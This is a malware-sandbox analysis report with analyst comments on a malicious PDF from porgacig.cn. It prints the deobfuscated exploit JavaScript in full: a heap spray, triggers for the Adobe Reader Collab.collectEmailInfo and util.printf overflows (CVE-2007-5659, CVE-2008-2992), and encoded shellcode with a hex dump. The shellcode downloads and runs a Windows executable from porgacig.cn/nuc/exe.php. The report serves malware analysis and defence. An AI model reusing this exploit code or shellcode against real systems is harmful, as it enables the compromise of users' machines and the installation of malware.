Analysis report for http://porgacig.cn/nuc/spl/pdf.pdf
Sample Overview
| URL | http://porgacig.cn/nuc/spl/pdf.pdf |
|---|
| MD5 | a3cdd8f09812f5658cc45012bfe93f21 |
| Analysis Started | 2009-02-22 11:34:27 |
| Report Generated | 2009-05-17 00:35:53 |
| Jsand version | 1.03.02 |
See the report for domain porgacig.cn.
Detection results
| Detector | Result |
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
Deobfuscation results
Evals
// Analyst note: the eval'd payload string. unescape() of the %uXXXX sequences
// yields the bytes listed under "Shellcode and Malware" below (the first code
// units %u4343%u4343%u0feb decode, little-endian, to 43 43 43 43 eb 0f). The
// last code units (%u7468%u7074%u2F3A ... %u7068) are the ASCII text
// "http://porgacig.cn/nuc/exe.php", the same URL the report lists under
// "Additional (potential) malware". The line breaks inside the string literal
// are an artifact of how the report was rendered, not part of the original.
var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
%uefeb" + "
%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
%ub9e7" + "
%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
%u0a96" + "
%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
%uee85" + "
%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
%ucfaa" + "
%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
%uebaf" + "
%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34
%u10bc" + "
%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6
%uf7ba" + "
%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec
%u0eec" + "
%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97
%ub91c" + "
%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04
%u11d4" + "
%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7
%u1b07" + "
%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u726F%u6167%u6963%u2E67%u6E63%u6E2F
%u6375%u652F%u6578%u702E%u7068");
// Global array that ooyS1YUR() fills with copies of padding + the payload string.
var mM6RItmK = new Array();
// Pads a string to a fixed size: doubles HydurAUR by self-concatenation until
// HydurAUR.length * 2 >= XbGQrcyY, then truncates it to XbGQrcyY / 2 characters.
// The only caller (ooyS1YUR) derives XbGQrcyY from a string length * 2, so the
// parameter appears to be a byte count and the result is that many UTF-16
// code units / 2 — hence the division.
// Note: substring() truncates a fractional XbGQrcyY / 2; the caller passes an
// even value, so no rounding occurs there.
function yNYJ8yVD(HydurAUR, XbGQrcyY){
while (HydurAUR.length * 2 < XbGQrcyY){
HydurAUR += HydurAUR;
}
HydurAUR = HydurAUR.substring(0, XbGQrcyY / 2);
return HydurAUR;
}
// First fill of the global array mM6RItmK: every element is a 0x9090 padding
// string (via yNYJ8yVD) followed by the payload string i0a7eJNL. Each element
// is sized so that padding bytes + payload bytes + 0x38 equals 0x400000 (4 MiB).
// Analyst note: the constant 0x0c0c0c0c is also the %u0c0c pattern that
// RYiFEs8K() passes as the msg argument to Collab.collectEmailInfo.
function ooyS1YUR(){
var jKts_E9h = 0x0c0c0c0c;
var Y9Ib6uuE = 0x400000;
// Byte length of the payload (two bytes per UTF-16 code unit).
var xxKaKDUU = i0a7eJNL.length * 2;
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU + 0x38);
var HydurAUR = unescape("%u9090%u9090");
HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
// (0x0c0c0c0c - 0x400000) / 0x400000 is about 47.19, so the loop below runs
// 48 times (indices 0..47), roughly 48 x 4 MiB of strings if allocation succeeds.
var lYab6ozx = (jKts_E9h - 0x400000) / Y9Ib6uuE;
for (var gEZCi09R = 0; gEZCi09R < lYab6ozx; gEZCi09R ++ ){
mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;
}
}
// Version-gated trigger for the Collab.collectEmailInfo overflow the report
// attributes to CVE-2007-5659 (see "Exploits" above).
// Reads app.viewerVersion, strips non-digits and takes the first three digit
// characters as [major, minor, patch]; the comparisons below use loose ==/<
// on those strings, so they are coerced to numbers.
function RYiFEs8K(){
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g, '');
var TPWRJTZJ = new Array(XrCU20If.charAt(0), XrCU20If.charAt(1), XrCU20If.charAt(2));
// Gate: fires for major < 7, for 7.0.x, and (oddly phrased) for any non-8
// major whose minor.patch is below 1.2 or whose minor is 0. Only this branch
// calls the code below; on other versions the function does nothing.
if ((TPWRJTZJ[0] != 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
(TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) || (TPWRJTZJ[0] < 7)){
ooyS1YUR();
// "%u0c0c%u0c0c" is 2 code units; doubling until length >= 44952 stops at
// 65536 code units of U+0C0C. Encoded as UTF-8 (e0 b0 8c) that is 196608
// bytes, consistent with the Arg1 cell (96 shown bytes + "other 196512
// bytes") in the "ActiveX controls" table below.
var nabGR_dc = unescape("%u0c0c%u0c0c");
while (nabGR_dc.length < 44952)nabGR_dc += nabGR_dc;
// Recorded by the sandbox as Collab.collectEmailInfo with Arg0 '' and Arg1 = msg.
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : nabGR_dc
}
);
}
}
// Top-level flow: run the version-gated Collab trigger, then build a second,
// independent set of padding + payload strings (mem[]) and finally call
// util.printf with an oversized "%45000f" format on a huge number — the
// pattern the report attributes to CVE-2008-2992 (see "Exploits" above).
// Note: iCnt, heapblock, bigblock, headersize, spray, fillblock, block, mem
// and i are all assigned without var, i.e. as implicit globals.
RYiFEs8K();
var nop = "";
// 129 iterations (128 down to 0), 5 code units of 0x9090 each: 645 code units.
for (iCnt = 128; iCnt >= 0 ;-- iCnt)nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + i0a7eJNL;
bigblock = unescape("%u9090%u9090");
headersize = 20;
// As rendered in the report, the line break between "heapblock.length" and
// "while (...)" has been lost; the text is shown here exactly as extracted.
spray = headersize + heapblock.lengthwhile (bigblock.length < spray)bigblock += bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length - spray);
// Grow block until block + spray reaches 0x40000 (262144) code units.
while (block.length + spray < 0x40000)block = block + block + fillblock;
mem = new Array();
// 1400 copies of block + heapblock.
for (i = 0; i < 1400; i ++ )mem[i] = block + heapblock;
// The numeric literal below is split across lines by the report rendering.
// Its value is recorded as 1.3E295 in the util.printf row of the
// "ActiveX controls" table below.
var num =
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
// Recorded by the sandbox as util.printf with Arg0 "%45000f" (count 1).
util.printf("%45000f", num);
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
| http://porgacig.cn/nuc/spl/pdf.pdf | 200 | application/pdf |
Redirects
No redirects.
ActiveX controls
AcrobatJavaScript
| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| Methods | | | |
| Collab.collectEmailInfo | '' | e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c | 1 |
| util.printf | %45000f | 1.3E295 | 1 |
Shellcode and Malware
| Hexadecimal | ASCII |
43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef
43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef
ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef
ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa
eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9
87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00
21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a
57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66
aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee
b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f
07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf
87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07
8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb
97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7
07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10
9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef
ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7
07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7
07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e
6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64
92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9
64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0
51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11
b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64
b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b
11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f
2f 70 6f 72 67 61 63 69 67 2e 63 6e 2f 6e 75 63
2f 65 78 65 2e 70 68 70 | CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/porgacig.cn/nuc
/exe.php |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://porgacig.cn/nuc/exe.php | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | a2872c88cdbaad0cd938ff05319889e4 | |